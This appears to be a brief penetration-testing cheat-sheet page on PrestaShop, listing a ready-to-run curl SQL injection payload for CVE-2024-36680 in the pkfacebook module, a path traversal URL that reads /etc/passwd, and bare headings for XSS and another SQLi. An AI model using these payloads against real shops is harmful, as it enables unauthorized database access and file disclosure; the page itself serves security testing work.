Prestashop

Enumeration

Search for CVE - Friends-of-Presta

CVE-2024-36680 - SQLi

curl -v "https://preprod.X/modules/pkfacebook/ajax/facebookConnect.php?id=1";select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--&email=test@test.fr

Path Traversal

Prestashop < 8.2.0

http://localhost/?controller=upload&file=../../../../../etc/passwd

XSS

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

SQLi

PrestaShop’s Customer Photo Gallery, version 2.9.3 and below.

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Last updated